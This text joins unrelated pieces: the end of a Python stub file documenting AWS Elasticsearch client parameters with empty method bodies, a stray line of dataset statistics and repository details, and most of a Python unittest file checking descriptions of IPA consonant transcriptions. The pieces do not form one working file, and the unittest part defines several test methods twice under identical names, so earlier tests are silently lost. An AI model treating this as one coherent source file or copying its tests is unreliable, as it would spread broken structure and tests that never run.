:param ElasticsearchClusterConfig:
The type and number of instances to instantiate for the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
- **ZoneAwarenessConfig** *(dict) --*
Specifies the zone awareness configuration for a domain when zone awareness is enabled.
- **AvailabilityZoneCount** *(integer) --*
An integer value to indicate the number of availability zones for a domain when zone awareness is enabled. This should be equal to number of subnets if VPC endpoints is enabled
- **DedicatedMasterType** *(string) --*
The instance type for a dedicated master node.
- **DedicatedMasterCount** *(integer) --*
Total number of dedicated master nodes, active and on standby, for the cluster.
:type EBSOptions: dict
:param EBSOptions:
Specify the type and size of the EBS volume that you want to use.
- **EBSEnabled** *(boolean) --*
Specifies whether EBS-based storage is enabled.
- **VolumeType** *(string) --*
Specifies the volume type for EBS-based storage.
- **VolumeSize** *(integer) --*
Integer to specify the size of an EBS volume.
- **Iops** *(integer) --*
Specifies the IOPD for a Provisioned IOPS EBS volume (SSD).
:type SnapshotOptions: dict
:param SnapshotOptions:
Option to set the time, in UTC format, for the daily automated snapshot. Default value is ``0`` hours.
- **AutomatedSnapshotStartHour** *(integer) --*
Specifies the time, in UTC format, when the service takes a daily automated snapshot of the specified Elasticsearch domain. Default value is ``0`` hours.
:type VPCOptions: dict
:param VPCOptions:
Options to specify the subnets and security groups for VPC endpoint. For more information, see `Creating a VPC <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-vpc.html#es-creating-vpc>`__ in *VPC Endpoints for Amazon Elasticsearch Service Domains*
- **SubnetIds** *(list) --*
Specifies the subnets for VPC endpoint.
- *(string) --*
- **SecurityGroupIds** *(list) --*
Specifies the security groups for VPC endpoint.
- *(string) --*
:type CognitoOptions: dict
:param CognitoOptions:
Options to specify the Cognito user and identity pools for Kibana authentication. For more information, see `Amazon Cognito Authentication for Kibana <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-cognito-auth.html>`__ .
- **Enabled** *(boolean) --*
Specifies the option to enable Cognito for Kibana authentication.
- **UserPoolId** *(string) --*
Specifies the Cognito user pool ID for Kibana authentication.
- **IdentityPoolId** *(string) --*
Specifies the Cognito identity pool ID for Kibana authentication.
- **RoleArn** *(string) --*
Specifies the role ARN that provides Elasticsearch permissions for accessing Cognito resources.
:type AdvancedOptions: dict
:param AdvancedOptions:
Modifies the advanced option to allow references to indices in an HTTP request body. Must be ``false`` when configuring access to individual sub-resources. By default, the value is ``true`` . See `Configuration Advanced Options <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomain-configure-advanced-options>`__ for more information.
- *(string) --*
- *(string) --*
:type AccessPolicies: string
:param AccessPolicies:
IAM access policy as a JSON-formatted string.
:type LogPublishingOptions: dict
:param LogPublishingOptions:
Map of ``LogType`` and ``LogPublishingOption`` , each containing options to publish a given type of Elasticsearch log.
- *(string) --*
Type of Log File, it can be one of the following:
* INDEX_SLOW_LOGS: Index slow logs contain insert requests that took more time than configured index query log threshold to execute.
* SEARCH_SLOW_LOGS: Search slow logs contain search queries that took more time than configured search query log threshold to execute.
* ES_APPLICATION_LOGS: Elasticsearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting.
- *(dict) --*
Log Publishing option that is set for given domain. Attributes and their details:
* CloudWatchLogsLogGroupArn: ARN of the Cloudwatch log group to which log needs to be published.
* Enabled: Whether the log publishing for given log type is enabled or not
- **CloudWatchLogsLogGroupArn** *(string) --*
ARN of the Cloudwatch log group to which log needs to be published.
- **Enabled** *(boolean) --*
Specifies whether given log publishing option is enabled or not.
:rtype: dict
:returns:
"""
pass
def upgrade_elasticsearch_domain(self, DomainName: str, TargetVersion: str, PerformCheckOnly: bool = None) -> Dict:
"""
Allows you to either upgrade your domain or perform an Upgrade eligibility check to a compatible Elasticsearch version.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/UpgradeElasticsearchDomain>`_
**Request Syntax**
::
response = client.upgrade_elasticsearch_domain(
DomainName='string',
TargetVersion='string',
PerformCheckOnly=True|False
)
**Response Syntax**
::
{
'DomainName': 'string',
'TargetVersion': 'string',
'PerformCheckOnly': True|False
}
**Response Structure**
- *(dict) --*
Container for response returned by `` UpgradeElasticsearchDomain `` operation.
- **DomainName** *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **TargetVersion** *(string) --*
The version of Elasticsearch that you intend to upgrade the domain to.
- **PerformCheckOnly** *(boolean) --*
This flag, when set to True, indicates that an Upgrade Eligibility Check needs to be performed. This will not actually perform the Upgrade.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
:type TargetVersion: string
:param TargetVersion: **[REQUIRED]**
The version of Elasticsearch that you intend to upgrade the domain to.
:type PerformCheckOnly: boolean
:param PerformCheckOnly:
This flag, when set to True, indicates that an Upgrade Eligibility Check needs to be performed. This will not actually perform the Upgrade.
:rtype: dict
:returns:
"""
pass
| 67.173052 | 1,110 | 0.564676 | 18,159 | 203,400 | 6.304367 | 0.042018 | 0.011425 | 0.020947 | 0.010203 | 0.891144 | 0.873569 | 0.860466 | 0.8507 | 0.837266 | 0.828557 | 0 | 0.01629 | 0.333628 | 203,400 | 3,027 | 1,111 | 67.195243 | 0.828339 | 0.865501 | 0 | 0.435484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.435484 | false | 0.435484 | 0.112903 | 0 | 0.564516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 11 |
311ac4d625133f9955913ad8594042a797912b6c | 671,979 | py | Python | test_ipa_text_to_description.py | elsanussi-s-mneina/phonetics-modeling-python | 2ffbeb4ac4b938d0f59e625896ad3a6b7aea9c85 | [
"MIT"
] | null | null | null | test_ipa_text_to_description.py | elsanussi-s-mneina/phonetics-modeling-python | 2ffbeb4ac4b938d0f59e625896ad3a6b7aea9c85 | [
"MIT"
] | 3 | 2020-10-15T15:33:25.000Z | 2021-02-18T21:43:49.000Z | test_ipa_text_to_description.py | elsanussi-s-mneina/phonetics-modeling-python | 2ffbeb4ac4b938d0f59e625896ad3a6b7aea9c85 | [
"MIT"
] | null | null | null | """
unit tests for testing describing a phoneme given its
representation in the international phonetic alphabet
Note to software developer:
The code in this module was generated from SpecGeneratorForPython.hs,
a file in the Haskell project.
"""
import unittest
from ipa import describe_transcription
class IPATextToDescription(unittest.TestCase):
# voiceless bilabial plosive pulmonic egressive consonant
def test_p_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p")
self.assertEqual(actual, expected)
def test_p̊_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊")
self.assertEqual(actual, expected)
def test_p̥_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥")
self.assertEqual(actual, expected)
def test_b̊_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊")
self.assertEqual(actual, expected)
def test_b̥_is_the_representation_of_the_voiceless_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥")
self.assertEqual(actual, expected)
# voiceless labialized bilabial plosive pulmonic egressive consonant
def test_pʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʷ")
self.assertEqual(actual, expected)
def test_p̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊ʷ")
self.assertEqual(actual, expected)
def test_p̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥ʷ")
self.assertEqual(actual, expected)
def test_b̊ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʷ")
self.assertEqual(actual, expected)
def test_b̥ʷ_is_the_representation_of_the_voiceless_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized bilabial plosive pulmonic egressive consonant
def test_pʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʲ")
self.assertEqual(actual, expected)
def test_p̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊ʲ")
self.assertEqual(actual, expected)
def test_p̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥ʲ")
self.assertEqual(actual, expected)
def test_b̊ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʲ")
self.assertEqual(actual, expected)
def test_b̥ʲ_is_the_representation_of_the_voiceless_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized bilabial plosive pulmonic egressive consonant
def test_pˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pˠ")
self.assertEqual(actual, expected)
def test_p̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊ˠ")
self.assertEqual(actual, expected)
def test_p̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥ˠ")
self.assertEqual(actual, expected)
def test_b̊ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ˠ")
self.assertEqual(actual, expected)
def test_b̥ˠ_is_the_representation_of_the_voiceless_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized bilabial plosive pulmonic egressive consonant
def test_pˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pˤ")
self.assertEqual(actual, expected)
def test_p̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̊ˤ")
self.assertEqual(actual, expected)
def test_p̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̥ˤ")
self.assertEqual(actual, expected)
def test_b̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ˤ")
self.assertEqual(actual, expected)
def test_b̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated bilabial plosive pulmonic egressive consonant
def test_pʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰ")
self.assertEqual(actual, expected)
def test_b̥ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰ")
self.assertEqual(actual, expected)
def test_b̊ʰ_is_the_representation_of_the_voiceless_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized bilabial plosive pulmonic egressive consonant
def test_pʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰʷ")
self.assertEqual(actual, expected)
def test_b̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰʷ")
self.assertEqual(actual, expected)
def test_b̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized bilabial plosive pulmonic egressive consonant
def test_pʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰʲ")
self.assertEqual(actual, expected)
def test_b̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰʲ")
self.assertEqual(actual, expected)
def test_b̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized bilabial plosive pulmonic egressive consonant
def test_pʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰˠ")
self.assertEqual(actual, expected)
def test_b̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰˠ")
self.assertEqual(actual, expected)
def test_b̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized bilabial plosive pulmonic egressive consonant
def test_pʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("pʰˤ")
self.assertEqual(actual, expected)
def test_b̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̥ʰˤ")
self.assertEqual(actual, expected)
def test_b̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̊ʰˤ")
self.assertEqual(actual, expected)
# voiced bilabial plosive pulmonic egressive consonant
def test_b_is_the_representation_of_the_voiced_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b")
self.assertEqual(actual, expected)
def test_p̬_is_the_representation_of_the_voiced_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬")
self.assertEqual(actual, expected)
def test_p̬_is_the_representation_of_the_voiced_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬")
self.assertEqual(actual, expected)
# voiced labialized bilabial plosive pulmonic egressive consonant
def test_bʷ_is_the_representation_of_the_voiced_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʷ")
self.assertEqual(actual, expected)
def test_p̬ʷ_is_the_representation_of_the_voiced_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʷ")
self.assertEqual(actual, expected)
def test_p̬ʷ_is_the_representation_of_the_voiced_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized bilabial plosive pulmonic egressive consonant
def test_bʲ_is_the_representation_of_the_voiced_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʲ")
self.assertEqual(actual, expected)
def test_p̬ʲ_is_the_representation_of_the_voiced_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʲ")
self.assertEqual(actual, expected)
def test_p̬ʲ_is_the_representation_of_the_voiced_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized bilabial plosive pulmonic egressive consonant
def test_bˠ_is_the_representation_of_the_voiced_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bˠ")
self.assertEqual(actual, expected)
def test_p̬ˠ_is_the_representation_of_the_voiced_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ˠ")
self.assertEqual(actual, expected)
def test_p̬ˠ_is_the_representation_of_the_voiced_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized bilabial plosive pulmonic egressive consonant
def test_bˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bˤ")
self.assertEqual(actual, expected)
def test_p̬ˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ˤ")
self.assertEqual(actual, expected)
def test_p̬ˤ_is_the_representation_of_the_voiced_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated bilabial plosive pulmonic egressive consonant
def test_bʰ_is_the_representation_of_the_voiced_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰ")
self.assertEqual(actual, expected)
def test_b̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰ")
self.assertEqual(actual, expected)
def test_p̬ʰ_is_the_representation_of_the_voiced_aspirated_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized bilabial plosive pulmonic egressive consonant
def test_bʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰʷ")
self.assertEqual(actual, expected)
def test_b̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰʷ")
self.assertEqual(actual, expected)
def test_p̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized bilabial plosive pulmonic egressive consonant
def test_bʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰʲ")
self.assertEqual(actual, expected)
def test_b̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰʲ")
self.assertEqual(actual, expected)
def test_p̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized bilabial plosive pulmonic egressive consonant
def test_bʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰˠ")
self.assertEqual(actual, expected)
def test_b̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰˠ")
self.assertEqual(actual, expected)
def test_p̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized bilabial plosive pulmonic egressive consonant
def test_bʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("bʰˤ")
self.assertEqual(actual, expected)
def test_b̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("b̬ʰˤ")
self.assertEqual(actual, expected)
def test_p̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_bilabial_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized bilabial plosive pulmonic egressive consonant"
actual = describe_transcription("p̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless alveolar plosive pulmonic egressive consonant
def test_t_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t")
self.assertEqual(actual, expected)
def test_t̊_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊")
self.assertEqual(actual, expected)
def test_t̥_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥")
self.assertEqual(actual, expected)
def test_d̊_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊")
self.assertEqual(actual, expected)
def test_d̥_is_the_representation_of_the_voiceless_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥")
self.assertEqual(actual, expected)
# voiceless labialized alveolar plosive pulmonic egressive consonant
def test_tʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʷ")
self.assertEqual(actual, expected)
def test_t̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊ʷ")
self.assertEqual(actual, expected)
def test_t̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥ʷ")
self.assertEqual(actual, expected)
def test_d̊ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʷ")
self.assertEqual(actual, expected)
def test_d̥ʷ_is_the_representation_of_the_voiceless_labialized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized alveolar plosive pulmonic egressive consonant
def test_tʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tʲ")
self.assertEqual(actual, expected)
def test_t̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̊ʲ")
self.assertEqual(actual, expected)
def test_t̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("t̥ʲ")
self.assertEqual(actual, expected)
def test_d̊ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̊ʲ")
self.assertEqual(actual, expected)
def test_d̥ʲ_is_the_representation_of_the_voiceless_palatalized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("d̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized alveolar plosive pulmonic egressive consonant
def test_tˠ_is_the_representation_of_the_voiceless_velarized_alveolar_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized alveolar plosive pulmonic egressive consonant"
actual = describe_transcription("tˠ")
self.assertEqual(actual, expected)
